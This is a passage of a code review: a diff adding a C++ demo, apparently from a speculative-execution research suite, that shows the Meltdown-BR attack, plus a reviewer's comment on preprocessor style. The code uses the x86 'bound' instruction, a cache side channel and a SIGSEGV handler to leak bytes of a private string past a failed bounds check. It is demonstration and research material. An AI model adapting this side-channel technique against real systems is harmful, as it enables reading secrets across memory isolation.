demos/meltdown_br.cc

```diff
@@ -0,0 +1,146 @@
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *   https://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+/**
+ * Meltdown-BR demonstrates speculation over the "bound" instruction on x86.
+ * That instruction is allowed only in 32-bit mode, so the example cannot work
+ * on 64-bits. We check with the "bound" instruction whether a given offset
+ * belongs to the public_data string. In the case of safe offset it passes,
+ * when the offset points to the private_data, the bounds check fails and
+ * SIGSEGV is triggered. However, the speculative execution continues past the
+ * bounds check.
+ **/
+
+#if !defined(__linux__) && !defined(__APPLE__)
+#  error Unsupported OS. Linux or MacOS required.
+#endif
+
+#ifndef __i386__
+#  error Unsupported architecture. 32-bit x86 required.
+#endif
+
+#include <array>
+#include <cstring>
+#include <fstream>
+#include <iostream>
+
+#include <signal.h>
+
+#include "cache_sidechannel.h"
+#include "instr.h"
+#include "utils.h"
+
+const char *public_data = "Hello, world!";
+const char *private_data = "It's a s3kr3t!!!";
+
+// ICC requires the offset variable to be volatile. If it isn't, ICC schedules
+// to spill it to stack after the second ForceRead call and that never happens
+// because of the SIGSEGV and architectural jumping over that section.
+// In the next loop the restore from stack spill just loads some random value
+// from the stack that was not rewritten.
+static char leak_byte(const char *data, volatile size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &isolated_oracle = sidechannel.GetOracle();
+
+  for (int run = 0;; ++run) {
+    size_t safe_offset = run % strlen(data);
+    sidechannel.FlushOracle();
+
+    // Checks bounds and accesses the safe offset. That succeeds.
+    BoundsCheck(data, safe_offset);
+    ForceRead(isolated_oracle.data() +
+              static_cast<unsigned char>(data[safe_offset]));
+
+    // Check bounds of the offset to private data. The check fails, but the
+    // speculative execution continues.
+    BoundsCheck(data, offset);
+    ForceRead(isolated_oracle.data() +
+              static_cast<unsigned char>(data[offset]));
+
+    // Unreachable code.
+    std::cout << "Dead code. Must not be printed." << std::endl;
+
+    // The exit call must not be unconditional, otherwise clang would optimize
+    // out everything that follows it and the linking would fail.
+    if (strlen(public_data) != 0) {
+      exit(EXIT_FAILURE);
+    }
+
+    // SIGSEGV signal handler moves the instruction pointer to this label.
+#ifdef __linux__
```

Comment:
```suggestion
#if defined(__linux__)
```

for symmetry with the `#elif` clause. Here and below.